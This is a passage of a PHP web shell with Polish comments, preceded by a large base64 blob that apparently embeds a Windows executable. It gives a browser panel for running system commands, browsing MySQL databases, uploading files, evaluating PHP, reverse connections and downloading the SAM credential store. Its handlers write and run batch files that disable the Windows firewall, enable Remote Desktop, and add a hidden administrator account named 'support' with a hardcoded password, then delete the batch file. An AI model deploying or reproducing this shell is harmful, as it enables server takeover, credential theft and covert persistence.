AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEdFVCAvZG93bmxvYWQvd2luMjAwMHBsYXRmb3JtL1NQL1NQMy9OVDUvRU4tVVMvVzJLc3AzLmV4ZSBIVFRQLzEuMA0KQWNjZXB0OiAqLyoNCkhvc3Q6IGRvd25sb2FkLm1pY3Jvc29mdC5jb20NClVzZXItQWdlbnQ6IHNpY2tuZXNzMjlhLzAuMQ0KDQoAABAAAABGYWlsZWQgdG8gZmluZCBXaW5zb2NrIDIuMiEKAAAAAApTeXN0ZW0gaW5mbzoKAABNYWNoaW5lOiBcXCVzIHJ1bm5pbmcgQCAlZCBNaHoKAFJ1bm5pbmcgYmFuZHdpZHRoIHRlc3QAAE1heCBJbnB1dCBzdHJlYW0gOiAlaUtCcHMKAABkb3dubG9hZC5taWNyb3NvZnQuY29tAABlcnJvcjogY2FuJ3QgcmVzb2x2ZSBob3N0CgAALgAAAA0AAABHZXRJZlRhYmxlAABJcGhscGFwaS5kbGwAAAAAR2V0TnVtYmVyT2ZJbnRlcmZhY2VzAAAASXBobHBhcGkuZGxsAAAAAEVycm9yIGxvYWRpbmcgSXBobHBhcGkuZGxsAABNUyBUQ1AgTG9vcGJhY2sgaW50ZXJmYWNlAAAAY2hlY2twYXRoPQAAJXMgLT4gJTEuMWYgR0IgZnJlZSAvICUxLjFmIEdCIFRvdGFsIHNwYWNlCgBoYXMgYmVlbiB1cCBmb3I6ICVkIGRheShzKSwgJWQgaG91cihzKSwgJWQgbWludXRlKHMpLA0KACVkAABHZXRJbmZvIHYwLjIgLSBRdWVyeSBzeXN0ZW0gaW5mbyBhbmQgdGVzdCBiYW5kd2l0ZGgKAAAAAENvcHlyaWdodCAoQykgMjAwMy0yMDA0IHNpY2tuZXNzLgoAAGh0dHA6Ly93d3cudGhpcy53ZWJzaXRlLmRvZXNudC5leGlzdAoAAABUaW1lb3V0Li4uLgoAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==";
?>
<hr>
<div align="center">
<form action="<?php echo $_SERVER['PHP_SELF']."?home=1"; ?>" method="post">
<input type="submit" value="dir" name="quickcmd">
<input type="submit" value="dir A:\" name="quickcmd">
<input type="submit" value="dir C:\" name="quickcmd">
<input type="submit" value="dir D:\" name="quickcmd">
<input type="submit" value="dir E:\" name="quickcmd">
<input type="submit" value="dir F:\" name="quickcmd">
<input type="submit" value="dir G:\" name="quickcmd">
<input type="submit" value="dir H:\" name="quickcmd">
<input type="submit" value="dir I:\" name="quickcmd">
<input type="submit" value="dir J:\" name="quickcmd">
<input type="submit" value="dir K:\" name="quickcmd">
<input type="submit" value="dir L:\" name="quickcmd">
<input type="submit" value="dir M:\" name="quickcmd">
<input type="submit" value="dir N:\" name="quickcmd"><br>
<input type="submit" value="dir O:\" name="quickcmd">
<input type="submit" value="dir P:\" name="quickcmd">
<input type="submit" value="dir Q:\" name="quickcmd">
<input type="submit" value="dir R:\" name="quickcmd">
<input type="submit" value="dir S:\" name="quickcmd">
<input type="submit" value="dir T:\" name="quickcmd">
<input type="submit" value="dir U:\" name="quickcmd">
<input type="submit" value="dir V:\" name="quickcmd">
<input type="submit" value="dir W:\" name="quickcmd">
<input type="submit" value="dir X:\" name="quickcmd">
<input type="submit" value="dir Y:\" name="quickcmd">
<input type="submit" value="dir Z:\" name="quickcmd"><br>
<input type="submit" value="tasklist" name="quickcmd">
<input type="submit" value="ipconfig /all" name="quickcmd">
<input type="submit" value="netstat -an" name="quickcmd">
<input type="submit" value="net start" name="quickcmd">
<input type="submit" value="systeminfo" name="quickcmd">
<input type="submit" value="net user" name="quickcmd"><br><hr>
<font color="red">Support<br>
<input type="submit" value="New User" name="newuser">
<input type="submit" value="Add Admin" name="addadmin">
<input type="submit" value="Delete User" name="deluser">
<input type="submit" value="All" name="all" style='color: red;'><br><hr>
Support_388945a0<br></font>
<input type="submit" value="New User" name="newuser1">
<input type="submit" value="Add Admin" name="addadmin1">
<input type="submit" value="Delete User" name="deluser1">
<input type="submit" value="All" name="all1" style='color: red;'><br><hr>
<input type="submit" value="box info" name="boxinfo">
<input type="submit" value="find shells" name="shellscan">
<input type="submit" value="MySQL" name="mysql">
<input type="submit" value="File Creater" name="batch">
<input type="submit" value="Portforwarding" name="forwarding">
<input type="submit" value="File upload" name="upload">
<input type="submit" value="BackConnect" name="backconnect">
<input type="submit" value="eval(PHP CODE)" name="evalphp">
<input type="submit" value="Editor" name="editor">
<input type="submit" value="Remote" name="remote">
<input type="submit" value="FTP" name="ftp">
<input type="submit" value="Remove" name="remove"><hr>
<input type="submit" value="Download: SAM" name="sam">
</pre></form>
<?php
if(isset($_POST['forwarding']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?forwarding=1\">";
}
if(isset($_POST['upload']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?upload=1\">";
}
if(isset($_POST['backconnect']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?reverse=1\">";
}
if(isset($_POST['evalphp']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?php=1\">";
}
if(isset($_POST['editor']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?editor=1\">";
}
if(isset($_POST['batch']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?bat=1\">";
}
if(isset($_POST['mysql']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?mysql=1\">";
}
if(isset($_POST['remote']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?remote=1\">";
}
if(isset($_POST['all']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?all=1\">";
}
if(isset($_POST['all1']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?all1=1\">";
}
if(isset($_POST['ftp']))
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=".$_SERVER['PHP_SELF']."?ftp=1\">";
}
if(isset($_GET['mysql']))
{
$host = $_POST['host'];
$port = $_POST['port'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
$tbl = $_POST['tbl'];
if(!mysql_connect($host.":".$port, $user, $pass))
{
echo "Could not connect:".mysql_error();
}
echo "<form action=\"".$_SERVER['PHP_SELF']."?mysql=1\" method=\"post\">";
echo "<input type=\"hidden\" value=\"$host\" name=\"host\"> ";
echo "<input type=\"hidden\" value=\"$port\" name=\"port\"> ";
echo "<input type=\"hidden\" value=\"$user\" name=\"user\"> ";
echo "<input type=\"hidden\" value=\"$pass\" name=\"pass\"> ";
echo "<input type=\"hidden\" value=\"$db\" name=\"db\"> ";
echo "<input type=\"hidden\" value=\"$tbl\" name=\"tbl\"> ";
echo "MySQL Query: <input type=\"text\" name=\"query\">";
echo "<input type=\"submit\" value=\"run query\" name=\"exec_query\"> ";
echo "</form>";
if($_REQUEST['exec_query'])
{
$query = $_POST['query'];
$result = mysql_query($query);
?>
<textarea cols="80" rows="5" readonly="readonly"><?php
while ( $row = mysql_fetch_row($result) )
{
echo $row[0]."\r\n";
}
?>
</textarea><br>
<?php
}
$query = "SHOW DATABASES";
$result = mysql_query($query);
echo "<b>DATABASES</b> <br>";
echo "<form action=\"".$_SERVER['PHP_SELF']."?mysql=1\" method=\"post\">";
echo "<input type=\"hidden\" value=\"$host\" name=\"host\"> ";
echo "<input type=\"hidden\" value=\"$port\" name=\"port\"> ";
echo "<input type=\"hidden\" value=\"$user\" name=\"user\"> ";
echo "<input type=\"hidden\" value=\"$pass\" name=\"pass\"> ";
while ( $row = mysql_fetch_row($result) )
{
echo "<input type=\"submit\" value=\"".$row[0]."\" name=\"db\"> ";
}
echo "</form>";
echo "<hr>";
if(isset($_POST['db']))
{
echo "<b>TABLES</b> <br>";
echo "<form action=\"".$_SERVER['PHP_SELF']."?mysql=1\" method=\"post\">";
echo "<input type=\"hidden\" value=\"$host\" name=\"host\"> ";
echo "<input type=\"hidden\" value=\"$port\" name=\"port\"> ";
echo "<input type=\"hidden\" value=\"$user\" name=\"user\"> ";
echo "<input type=\"hidden\" value=\"$pass\" name=\"pass\"> ";
echo "<input type=\"hidden\" value=\"$db\" name=\"db\"> ";
$query = "SHOW TABLES FROM $db";
$result = mysql_query($query);
$i = 0;
while ( $row = mysql_fetch_row($result) )
{
if($i == 4)
{
echo "<br>";
$i = 0;
}
echo "<input id=\"mysql_tbl_but\" type=\"submit\" value=\"".$row[0]."\" name=\"tbl\"> ";
++$i;
}
echo "</form>";
echo "<hr>";
}
if(isset($_POST['tbl']))
{
echo "<b>COLUMNS</b> <br>";
echo "<form action=\"".$_SERVER['PHP_SELF']."?mysql=1\" method=\"post\">";
echo "<input type=\"hidden\" value=\"$host\" name=\"host\"> ";
echo "<input type=\"hidden\" value=\"$port\" name=\"port\"> ";
echo "<input type=\"hidden\" value=\"$user\" name=\"user\"> ";
echo "<input type=\"hidden\" value=\"$pass\" name=\"pass\"> ";
echo "<input type=\"hidden\" value=\"$db\" name=\"db\"> ";
echo "<input type=\"hidden\" value=\"$tbl\" name=\"tbl\"> ";
$query = "SHOW COLUMNS FROM $db.$tbl";
$result = mysql_query($query);
$i = 0;
while ( $row = mysql_fetch_row($result) )
{
if($i == 4)
{
echo "<br>";
$i = 0;
}
echo "<input type=\"checkbox\" name=\"col[]\" value=\"".$row[0]."\">";
echo "<input id=\"mysql_tbl_but\" type=\"submit\" value=\"".$row[0]."\" name=\"col\"> ";
++$i;
}
echo "<br>";
echo "<input id=\"mysql_tbl_but\" type=\"submit\" value=\"SHOW CONTENT\" name=\"showcontent\"> ";
echo "</form>";
echo "<hr>";
}
if(isset($_POST['showcontent']))
{
echo "<b>CONTENT</b> <br>";
$col = array();
$cols = $_POST['col'];
$col = implode(",", $_POST['col']);
$query = "Select $col FROM $db.$tbl";
$result = mysql_query($query);
echo "<table>";
$i = 0;
echo "<tr >";
while($i < sizeof($cols))
{
echo "<td id=\"mysql_content\">".$cols[$i]."</td>";
++$i;
}
echo "</tr>";
while ( $row = mysql_fetch_array($result) )
{
echo "<tr>";
$i = 0;
while($i < sizeof($cols))
{
echo "<td id=\"mysql_content\">".$row[$cols[$i]]."</td>";
++$i;
}
echo "</tr>";
}
echo "</table>";
echo "<br>";
echo "<hr>";
}
?>
<pre>
<form action="<?php echo $_SERVER['PHP_SELF']."?mysql=1"; ?>" method="post">
host: <input type="text" value="localhost" name="host"> port: <input type="text" value="3306" name="port">
user: <input type="text" value="root" name="user"> pass: <input type="text" name="pass">
<input type="submit" value="connect" name="mysqlconnect">
</form>
</pre>
<?php
exit;
}
if(isset($_GET['bat']))
{
if($_REQUEST['batcreate'])
{
$fname = $_POST['batname'];
$fpath = stripslashes($_POST['batpath']);
$content = stripslashes($_POST['batcontent']);
$bat = fopen($fpath.$fname, "w+");
if(fwrite($bat, $content))
{
echo "<script> alert(\"".$_POST['batpath'].$fname." saved successfully!\"); </script>";
}
else
{
echo "<script> alert(\"".$fpath.$fname." not created!\"); </script>";
}
fclose($bat);
}
?>
<form action="<?php echo $_SERVER['PHP_SELF']."?bat=1"; ?>" method="post">
<div align="left">
<pre>
name of batchfile: <input type="text" name="batname" value="created.bat">
path of batchfile: <input name="batpath" type="text" value="<?php echo str_replace("/", "\\", $_SERVER['DOCUMENT_ROOT'])."\\"; ?>" size="30"> <input type="submit" value="create" name="batcreate">
Content:
<textarea name="batcontent" cols="100" rows="20"></textarea>
</pre>
</div>
</form>
<?php
exit;
}
if($_REQUEST['remote'])
{
$fname = "a00.bat";
$fpath = "C:\\xampp\\phpmyadmin\\";
$content = 'net stop sharedaccess
net stop MpsSvc
cd c:\
cd windows
cd system32
reg.exe ADD "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f';
$bat = fopen($fpath.$fname, "w+");
if(fwrite($bat, $content))
{
$rem = "Plik bat zapisany ";
}
else
{
$rem = "Plik bat nie zapisany";
}
fclose($bat);
$cmd = "$fname";
$result = cmd_exec("$cmd");
//echo $result;
/*$resultx = cmd_exec("dir");
$czy = strpos($resultx, $cmd);
if ($czy == FALSE)
$result2 = "Plik zostal usunięty";
else
$result2 = "Plik nadal jest na serwerze!";*/
shell_exec("del $cmd");
//echo $result1;
$resultx = cmd_exec("dir");
$czy = strpos($resultx, $cmd);
if ($czy == FALSE)
$result1 = "Plik zostal usunięty";
else
$result1 = "Plik nadal jest na serwerze!";
?>
<textarea id="topbox" readonly="readonly"><?php echo $rem; echo chr(13); echo chr(13); echo $result; echo chr(13); echo chr(13); echo $result1; ?></textarea>
<?php
}
if($_REQUEST['all'])
{
$fname = "a00.bat";
$fpath = "C:\\xampp\\phpmyadmin\\";
$content = "net user support /delete
net user support barnaba1981** /add
net localgroup administrators support /add";
$bat = fopen($fpath.$fname, "w+");
if(fwrite($bat, $content))
{
$rem = "Plik bat zapisany ";
}
else
{
$rem = "Plik bat nie zapisany";
}
fclose($bat);
$cmd = "$fname";
$result = cmd_exec("$cmd");
//echo $result;
$result1 = shell_exec("del $cmd");
//echo $result1;
$resultx = cmd_exec("dir");
$czy = strpos($resultx, $cmd);
if ($czy == FALSE)
$result1 = "Plik zostal usunięty";
else
$result1 = "Plik nadal jest na serwerze!";
?>
